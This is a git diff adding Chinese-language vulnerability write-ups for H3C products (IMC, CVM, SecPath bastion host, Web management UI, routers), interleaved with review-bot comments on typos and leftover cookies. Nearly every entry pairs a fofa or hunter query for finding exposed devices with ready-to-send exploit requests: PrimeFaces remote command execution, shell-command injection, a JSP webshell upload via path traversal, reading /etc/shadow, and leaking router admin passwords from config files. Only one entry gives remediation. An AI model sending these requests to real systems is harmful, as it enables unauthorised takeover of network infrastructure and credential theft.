@@ -0,0 +1,24 @@ +## H3C Magic B1STV100R012 RCE +``` +POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 +Host: xxx.xxx.xxx.xxx +Content-Length: 1569 +Content-Type: application/x-www-form-urlencoded + +pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami +``` + +fofa:app="H3C-Ent-Router" +``` +POST /goform/aspForm HTTP/1.1 +Host: {{Hostname}} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) +AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 
Safari/605.1.15 +Connection: close +Content-Length: 68 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Referer: http://{{Hostname}}/userLogin.asp +CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp¶m=1; $(ls>/www/test); +访问 http://xxx/test +``` diff --git a/H3C-用户自助服务平台-dynamiccontent.properties.xhtml存在RCE漏洞.md b/H3C-用户自助服务平台-dynamiccontent.properties.xhtml存在RCE漏洞.md new file mode 100644 index 0000000..7075255 --- /dev/null +++ b/H3C-用户自助服务平台-dynamiccontent.properties.xhtml存在RCE漏洞.md 
@@ -0,0 +1,20 @@ +## H3C 用户自助服务平台 dynamiccontent.properties.xhtml存在RCE漏洞 + +## fofa + +``` +fid="tPmVs5PL6e9m5Xt0J4V2+A==" +``` + +## poc + +``` +POST /mselfservice/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 +Host: 127.0.0.1 +User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE) +Content-Length: 1573 +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip + +pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=whoami +``` 
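Review bot: in the H3C 用户自助服务平台 dynamiccontent.properties.xhtml hunk the request carries `User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; ...)`, the header name repeated inside its own value; keep a single `User-Agent:`. The hunk also gives no affected version, build or vendor reference, so the `fid="tPmVs5PL6e9m5Xt0J4V2+A=="` fofa fingerprint is the only identifying information a reader has; add at least the product version the PoC was run against.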
diff --git a/H3CCVM前台任意文件上传漏洞.md b/H3CCVM前台任意文件上传漏洞.md new file mode 100644 index 0000000..87789ea --- /dev/null +++ b/H3CCVM前台任意文件上传漏洞.md @@ -0,0 +1,42 @@ +# H3C CVM 前台任意文件上传漏洞 + +# 一、漏洞简介 +H3C公司依托其强大的技术实力、产品与服务优势,以及深入人心的以客户为中心的理念,为企业数据中心IaaS云计算基础架构提供最优化的虚拟化与云业务运营解决方案。通过H3C CAS CVM虚拟化管理系统实现数据中心虚拟化环境的中央管理控制,以简洁的管理界面,统一管理数据中心内所有的物理资源和虚拟资源,不仅能提高管理员的管控能力、简化日常例行工作,更可降低IT环境的复杂度和管理成本。H3C CVM存在任意文件上传漏洞,攻击者可以上传任意文件,获取webshell,控制服务器权限,读取敏感信息等。 + +# 二、影响版本 ++ H3C CVM + +## 三、资产测绘 ++ hunter `app.name="H3C CAS 云服务"` ++ 特征 + +![1699805998553-a9cd393a-f4d8-407b-a39e-9d863f2a0095.png](./img/yHLjlsks1B1hI0Ja/1699805998553-a9cd393a-f4d8-407b-a39e-9d863f2a0095-146415.png) + +## 四、漏洞复现 +```plain +POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/stc.jsp&name=222 HTTP/1.1 +Host: xx.xx.xx.xx +Content-Range: bytes 0-10/20 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +Content-Length: 23 + +<%out.print("99999");%> +``` + +![1699806057817-f90bda5b-4e38-4c2f-a7d7-d52d48f39cdf.png](./img/yHLjlsks1B1hI0Ja/1699806057817-f90bda5b-4e38-4c2f-a7d7-d52d48f39cdf-842579.png) + +文件上传位置,请求需携带请求头Content-Range: bytes 0-10/20 + +```plain +GET /cas/js/lib/buttons/stc.jsp HTTP/1.1 +Host: xx.xx.xx.xx +Content-Range: bytes 0-10/20 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 +``` + +![1699806074843-f8eee24b-4127-482a-8146-396e97b5d5c6.png](./img/yHLjlsks1B1hI0Ja/1699806074843-f8eee24b-4127-482a-8146-396e97b5d5c6-942461.png) + + + +> 更新: 2024-02-29 23:57:19 +> 原文: \ No newline at end of file diff --git a/H3CIMC远程命令执行漏洞.md b/H3CIMC远程命令执行漏洞.md new file mode 100644 index 0000000..81874bd --- /dev/null +++ b/H3CIMC远程命令执行漏洞.md 
@@ -0,0 +1,48 @@ +# H3C IMC 远程命令执行漏洞 + +# 一、漏洞概述 +H3C IMC(Intlligent Management Center)智能管理中心是H3C推出的下一代业务智能管理产品。它融合了当前多个产品,以统一风格提供与网络相关的各类管理、控制、监控等功能;同时以开放的组件化的架构原型,向平台及其承载业务提供分布式、分级式交互管理特性;并为业务软件的下一代产品提供最可靠的、可扩展、高性能的业务平台。 +H3C IMC dynamiccontent.properties.xhtml 存在远程命令执行,攻击者通过构造特殊的请求造成远程命令执行 + +# 二、影响版本 +H3C IMC + +# 三、资产测绘 ++ FOFA:`body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui"` + +![1689519334500-a1cf7457-ee3a-4052-8e36-53bd8df4c281.png](./img/uHodyoTTZJUrnqUk/1689519334500-a1cf7457-ee3a-4052-8e36-53bd8df4c281-334876.png) + ++ 登陆页面: + +![1689519365071-67684930-e208-4ae5-a892-175f60f5b428.png](./img/uHodyoTTZJUrnqUk/1689519365071-67684930-e208-4ae5-a892-175f60f5b428-458481.png) + +# 四、漏洞复现 +漏洞位置:`/imc/javax.faces.resource/dynamiccontent.properties.xhtml` + +数据包: + +```plain +POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 +Host: 127.0.0.1:9090 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: JSESSIONID=F92841E0E8B8B5862380EE8A26113638; oam.Flash.RENDERMAP.TOKEN=-2s6vgzlac +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +Content-Length: 1567 + 
+cmd=whoami&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&pfdrt=sc +``` + +![1689519490720-6b4386a4-69b6-48a2-91f0-6702e4b260a6.png](./img/uHodyoTTZJUrnqUk/1689519490720-6b4386a4-69b6-48a2-91f0-6702e4b260a6-819474.png) + +# 五、整改建议 +升级IMC平台和相关组件的版本到最新,需注意适配的情况。其次可以在IMC所在的服务器的操作系统防火墙上配置出入站规则,拦截高危端口。在网络设备侧或安全设备侧通过安全策略、ACL的方式来进行拦截。条件允许的话,可考虑给服务器操作系统打补丁 + + + +> 更新: 2024-02-29 23:57:19 +> 原文: \ No newline at end of file 
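Review bot: `Cookie: JSESSIONID=F92841E0E8B8B5862380EE8A26113638; oam.Flash.RENDERMAP.TOKEN=-2s6vgzlac` in the request is a captured session value that is not needed to document the issue and should be replaced with a placeholder; likewise `Host: 127.0.0.1:9090` should follow the `xx.xx.xx.xx` convention used elsewhere in the commit. Typo in `# 一、漏洞概述`: `Intlligent` should be `Intelligent`. The `# 五、整改建议` section is the only remediation block in this batch and is worth keeping; its last sentence lacks a full stop and would be stronger with a concrete fixed version or vendor advisory reference rather than "升级到最新".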
diff --git a/H3CSecPath堡垒机data_provider.php远程命令执行漏洞.md b/H3CSecPath堡垒机data_provider.php远程命令执行漏洞.md new file mode 100644 index 0000000..8741bf0 --- /dev/null +++ b/H3CSecPath堡垒机data_provider.php远程命令执行漏洞.md 
@@ -0,0 +1,57 @@ +# H3C SecPath堡垒机 data_provider.php 远程命令执行漏洞 + +# 一、漏洞简介 +H3C SecParh堡垒机 data_provider.php 存在远程命令执行漏洞,攻击者通过任意用户登录或者账号密码进入后台就可以构造特殊的请求执行命令。 + +# 二、影响版本 ++ H3C SecParh堡垒机 + +# 三、资产测绘 ++ fofaapp="H3C-SecPath-运维审计系统" && body="2018" ++ 登录页面 + +![1692631905675-9287b478-0c9a-4758-9f18-3849248ffff0.png](./img/4J1iVrH3VLVHqVI0/1692631905675-9287b478-0c9a-4758-9f18-3849248ffff0-489477.png) + +# 四、漏洞复现 +1. 通过POC设置cookie + +```plain +GET /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin HTTP/1.1 +Host: xx.xx.xx.xx +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Cookie: PHPSESSID=grlcbpjqpu59r6aanqjsn2gao0 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 +``` + +![1692666828015-6ad374fa-5e3e-4c1e-8de3-c5a44fc0b990.png](./img/4J1iVrH3VLVHqVI0/1692666828015-6ad374fa-5e3e-4c1e-8de3-c5a44fc0b990-478316.png) + +2. 
通过设置的cookie执行命令 + +```plain +GET /audit/data_provider.php?ds_y=2019&ds_m=04&ds_d=02&ds_hour=09&ds_min40&server_cond=&service=$(pwd)&identity_cond=&query_type=all&format=json&browse=true HTTP/1.1 +Host: xx.xx.xx.xx +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Cookie: PHPSESSID=grlcbpjqpu59r6aanqjsn2gao0 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 +``` + +![1692666807243-fc8aac1a-67f8-44d5-b0d9-80034077e89d.png](./img/4J1iVrH3VLVHqVI0/1692666807243-fc8aac1a-67f8-44d5-b0d9-80034077e89d-819281.png) + + + +> 更新: 2024-02-29 23:57:19 +> 原文: \ No newline at end of file diff --git a/H3CWeb网管登录系统aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md b/H3CWeb网管登录系统aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md new file mode 100644 index 0000000..b49d85d --- /dev/null +++ b/H3CWeb网管登录系统aaa_portal_auth_wchat_submit存在远程命令执行漏洞.md 
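Review bot: `# 一、漏洞简介` and `# 二、影响版本` spell the product `SecParh` while the title says `SecPath`; fix the typo. In `# 三、资产测绘` the bullet `+ fofaapp="H3C-SecPath-运维审计系统" && body="2018"` is missing the separator between `fofa` and the query. Both request blocks carry a captured `Cookie: PHPSESSID=grlcbpjqpu59r6aanqjsn2gao0`; replace it with a placeholder. The entry correctly documents a two-step chain (step 1 obtains a session through `gui_detail_view.php`, step 2 uses it against `data_provider.php`), which is useful for detection, but affected-version and remediation sections are absent.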
@@ -0,0 +1,41 @@ +# H3CWeb网管登录系统aaa_portal_auth_wchat_submit存在远程命令执行漏洞 + +# 一、漏洞简介 +H3CWeb网管登录系统aaa_portal_auth_wchat_submit存在远程命令执行漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ H3C用户网管登录系统 + +# 三、资产测绘 ++ hunter`app.name=="H3C Web 网管"` ++ 特征 + +![1701757610344-1df9adee-96b0-44a3-b3fe-1dd053b0ebd2.png](./img/-wD-0hxEiTfW9UpW/1701757610344-1df9adee-96b0-44a3-b3fe-1dd053b0ebd2-819639.png) + +# 四、漏洞复现 +```plain +GET /webui/?g=aaa_portal_auth_wchat_submit&suffix=;echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/stc.txt|ls HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: {hostname} +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1703406198887-d7773622-0e8c-4f94-874c-d8705e0decea.png](./img/-wD-0hxEiTfW9UpW/1703406198887-d7773622-0e8c-4f94-874c-d8705e0decea-740943.png) + +获取命令执行结果 + +```plain +GET /sslvpn/stc.txt HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: {hostname} +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1703406215229-b92a5c74-1367-432b-a589-3e637bbe1e0c.png](./img/-wD-0hxEiTfW9UpW/1703406215229-b92a5c74-1367-432b-a589-3e637bbe1e0c-482105.png) + + + +> 更新: 2024-02-29 23:57:19 +> 原文: \ No newline at end of file diff --git a/H3CWeb网管登录系统jQuery-1.7.2存在任意文件读取.md b/H3CWeb网管登录系统jQuery-1.7.2存在任意文件读取.md new file mode 100644 index 0000000..cc72ffc --- /dev/null +++ b/H3CWeb网管登录系统jQuery-1.7.2存在任意文件读取.md 
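Review bot: `# 二、影响版本` (`H3C用户网管登录系统`) names a product rather than a version, and there is no remediation section. The first request writes output to `/usr/local/webui/sslvpn/stc.txt` and the second reads it back via `/sslvpn/stc.txt`; for defenders that path and the `?g=aaa_portal_auth_wchat_submit&suffix=;` pattern are the observable indicators and should be called out in `# 一、漏洞简介`. The screenshot `1701757610344-1df9adee-...png` is committed twice in this batch (here and in the sslvpn_client file); keep one copy.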
@@ -0,0 +1,33 @@ +# H3C Web网管登录系统jQuery-1.7.2存在任意文件读取 + +# 一、漏洞简介 +H3C Web网管登录系统jQuery-1.7.2存在任意文件读取漏洞,其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件。 + +## 二、影响版本 ++ H3C用户网管登录系统 + +# 三、资产测绘 ++ hunter`web.body="webui/js/jquerylib/jquery-1.7.2.min.js"` ++ 特征 + +![1699976084811-ac173385-4963-406a-ba41-d03251a1c453.png](./img/TwNVOLVx89ZNCJov/1699976084811-ac173385-4963-406a-ba41-d03251a1c453-175462.png) + +# 四、漏洞复现 +```plain + GET /webui/?g=sys_dia_data_down&file_name=../../../../../etc/shadow HTTP/1.1 + Host: xx.xx.xx.xx + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 + Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + Accept-Encoding: gzip, deflate + Connection: close + Cookie: USGSESSID=a9523e6ede287f558817c3bbcf9a60be + Upgrade-Insecure-Requests: 1 +``` + +![1694660996937-199bec25-d529-4f3a-aa85-d888280b1627.png](./img/TwNVOLVx89ZNCJov/1694660996937-199bec25-d529-4f3a-aa85-d888280b1627-831084.png) + + + +> 更新: 2024-02-29 23:57:19 +> 原文: \ No newline at end of file diff --git a/H3CWeb网管登录系统sslvpn_client存在命令执行漏洞.md b/H3CWeb网管登录系统sslvpn_client存在命令执行漏洞.md new file mode 100644 index 0000000..4a4271e --- /dev/null +++ b/H3CWeb网管登录系统sslvpn_client存在命令执行漏洞.md 
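Review bot: the title and `# 一、漏洞简介` attribute the issue to `jQuery-1.7.2`, but the described bug is in the `sys_dia_data_down` module (`/webui/?g=sys_dia_data_down&file_name=...`); the jQuery version is only the fingerprint used in the hunter query, so the wording should separate the fingerprint from the vulnerable component. Heading levels mix `#` and `##` (`## 二、影响版本`). Every line of the request block is indented by a leading space inside the fence, and `Cookie: USGSESSID=a9523e6ede287f558817c3bbcf9a60be` is a captured value that should be a placeholder.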
@@ -0,0 +1,41 @@ +# H3CWeb网管登录系统sslvpn_client存在命令执行漏洞 + +# 一、漏洞简介 +H3C用户网管登录系统sslvpn_client存在命令执行漏洞,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ H3C用户网管登录系统 + +# 三、资产测绘 ++ hunter`app.name=="H3C Web 网管"` ++ 特征 + +![1701757610344-1df9adee-96b0-44a3-b3fe-1dd053b0ebd2.png](./img/9iCDf0Y97piuySfp/1701757610344-1df9adee-96b0-44a3-b3fe-1dd053b0ebd2-032911.png) + +# 四、漏洞复现 +```java +GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1701757665612-01db350b-d4ee-40d2-ac84-bdcc020341e8.png](./img/9iCDf0Y97piuySfp/1701757665612-01db350b-d4ee-40d2-ac84-bdcc020341e8-786975.png) + +获取命令执行结果 + +```java +GET /sslvpn/ceshi.txt HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1701754995310-190a24ff-8343-4b7e-9499-43cb74c7d076.png](./img/9iCDf0Y97piuySfp/1701754995310-190a24ff-8343-4b7e-9499-43cb74c7d076-784276.png) + + + +> 更新: 2024-02-29 23:57:19 +> 原文: \ No newline at end of file diff --git a/H3C多系列路由器存在任意用户登录漏洞.md b/H3C多系列路由器存在任意用户登录漏洞.md new file mode 100644 index 0000000..27bcc31 --- /dev/null +++ b/H3C多系列路由器存在任意用户登录漏洞.md 
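Review bot: both fences are tagged ```java for what are raw HTTP requests; the other H3C files use ```plain, so use that (the tag is meaningless here). `# 一、漏洞简介` says `H3C用户网管登录系统` while the title says `H3CWeb网管登录系统`; keep the product name consistent across the file. As with the aaa_portal entry, the written file `/usr/local/webui/sslvpn/ceshi.txt` and the `sslvpn_client.php?client=logoImg&img=` pattern are the detection indicators and should be stated in prose. No version or remediation information.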
@@ -0,0 +1,44 @@ +# H3C多系列路由器存在任意用户登录漏洞 + +# 一、漏洞简介 + H3C 企业路由器(ERN ERG2N GR 系列》存在任意用户登录和命令 执行漏洞,攻击者可通过访问nserLog in.asp/actionpalicy_status1./xxxx.cfg 接口,xxxx为设备型号(比如设备型号为 ER5200G2 ,即访问userLog in.asp/../actionpolicy_status/../ER5200G2.cfg),统过COOKIE 验证,进行目录穿越,获取 设备的明文配置文件,配置中有明文的web 管理员账号admin 的密码,登陆后台 即可通过开启 telenet 获取命令执行权限 + +# 二、影响版本 ++ H3C多系列路由器 + +# 三、资产测绘 ++ hunter`app.name="H3C Router Management"` ++ 登录页面 + +![1693536029401-fe49c297-e04b-42c4-8935-a0a3181716cd.png](./img/MqXw12ts-2hI9P3j/1693536029401-fe49c297-e04b-42c4-8935-a0a3181716cd-205034.png) + +# 四、漏洞复现 +1. 访问userLog in.asp/actionpalicy_status1./xxxx.cfg 接口,xxxx为设备型号(比如设备型号为 ER5200G2 ,即访问userLog in.asp/../actionpolicy_status/../ER5200G2.cfg) +2. 根据设备型号修改payload + +```java +GET /userLogin.asp/../actionpolicy_status/../ER2200G2.cfg HTTP/1.1 +User-Agent: Java/1.8.0_381 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +``` + +![1693536147392-494bee2a-1d0a-4c59-b943-d9628a7a00ef.png](./img/MqXw12ts-2hI9P3j/1693536147392-494bee2a-1d0a-4c59-b943-d9628a7a00ef-397355.png) + +3. 密码就在`vtypasswd`字段 + +![1693536224274-36454c0c-1465-42d4-bb2a-8898f177df6a.png](./img/MqXw12ts-2hI9P3j/1693536224274-36454c0c-1465-42d4-bb2a-8898f177df6a-471592.png) + +4. 账户为`admin` + 